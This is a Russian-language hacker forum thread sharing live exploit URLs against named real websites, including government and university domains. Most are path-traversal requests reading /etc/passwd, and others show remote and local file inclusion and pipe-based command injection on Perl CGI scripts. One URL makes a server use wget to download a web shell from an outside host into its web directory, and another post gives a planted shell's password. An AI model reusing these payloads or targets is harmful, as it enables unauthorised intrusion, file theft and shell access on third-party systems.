PHP Иньекции

pr 4
http://www.fonprevial.org.co/download.php?file=../../../../../../../../../../../etc/passwd

тупое читалко
https://secure4.olemiss.edu/umpolicyopen/GetPdfActive?pol=10967301&ver=active&file=../../../../../../../../../../../etc/passwd%00.pdf

 

http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

можно передвигаться по всему компу ...
PS:Сайт в локалке,но можно в него и с инета зайти
Это похоже не PHP инъекцмя

 

Все в открытую)

 

http://www.grammi.edu.gr/gr/index.php?page=[ url ]
это не инекция
оно просто вставляет во фрейм

 

gov, pr9

gov, pr7

 

http://zwgkml.harbin.gov.cn/hrb_zwgkml/file.php?filename=../../../../../../../../../../../etc/passwd
Читалко
http://www.factordinero.com.co/docs/download.php?file=download.php

 

Code:

http://www.uaemet.gov.ae/upload/filedownload_backend.php?file=../../../../../../../../../../../etc/passwd

Code:

http://www.telcat-starclub.de/cgi-bin/parse.pl?file=../../../../../../../../../../../etc/passwd

Code:

http://www.netstor.com.tw/dl.php?file=../../../../../../../../../../../etc/passwd

 

liveinternet.ru
Po vsem priznakam est' includ, jal' 4to nastroika servera ne pozvolaet vospol'zovat's9 dannoj bagoj
http://www.liveinternet.ru/stat/index.html?lang=./././en

 

ну вот смотри:

пишем:
http://www.liveinternet.ru/stat/index.html?lang=./././en
и видим вверху справа:

вверху слева:

на английском языке.


теперь пишем так:
http://www.liveinternet.ru/stat/index.html?lang=./././en./././

это на случай, если ./ вырезается.
Видим. что язык стал русским - значит - по дефолту - произошла ошибка.

Если пишешь ./././ до имени (ну типа точка - текущий каталог) - ошибки нет


пишем:

http://www.liveinternet.ru/stat/index.html?lang=./././es

и язык испанский.

А эксплуатировать не удастся потому, что нуль-байт фильтруется, а в конце есть приставка. И в начале тоже. То есть есть возможность подключать (или читать) файлы с тем расширением, с каким и файлы с языками

 

"Работница" - журнал для семейного чтения


Уязвимый код в файле part.php:

PHP:

include($rubr.".php");

Использование:

 

Code:

http://www.o3on.com/cgi-bin/use.pl?content=|ls$IFS-lia|
http://www.o3on.com/cgi-bin/use.pl?content=|id|

Я хз че за юзер но wget, curl и прочая дребедень... Там просто их нет. Ошибки при неправильном использовании wget не выдаются. Шелл на перл не залить. Однако файлы читаются отменно

 

да дело не в том что их нет, они есть, lynx точно, вгета вроде нет
http://www.o3on.com/cgi-bin/use.pl?content=|lynx|
тут дело в том что какая то кривота с командой which, она вообще ничего не находит, даже саму себя =)
http://www.o3on.com/cgi-bin/use.pl?content=|which$IFSwhich|

 

http://www.o3on.com/cgi-bin/use.pl?content=|which%20which|
вот так работает

 

http://www.iqauto.com/cgi-bin/hist.pl?cd=|wget%20http://omfg0o.narod.ru/antichat.php%20-O%20/home/iqauto/www//ads/a.php|
шелл найдёте =)

 

вроде бы локальный инклуд

PHP:

http://www.mmanews.com/page.php?page=../../../../../../../../../etc/passwd%00

PHP:

http://svpu-profi.lg.ua/page.php?page=[инклуд]

 

_http://www.o3on.com/cgi-bin/use.pl
Шелл. Пароль r57
Ойойёй... бл*ть... юзе.пл переписал... ну и *** с ним...

 

Ищи проблему в самом шелле
http://www.immovent.ch/index2.php?main=http://forum.antichat.ru/index
Иньекция рабоатет

 

BanQui

 

BanQui
шелл нормальный, это ты криворукий...
+ там safe-mode ON

 

Code:

http://kastoria.teikoz.gr/pr/html_eng/wrap.php?file=../../../../../../../../../../../etc/passwd
http://www.jcattan.com/dn.php?file=../../../../../../../../../../../etc/passwd
http://webeng.tccg.gov.tw/download.php?file=../../../../../../../../../../../etc/passwd
http://www.ipox.org.tw/download.php?file=../../../../../../../../../../../etc/passwd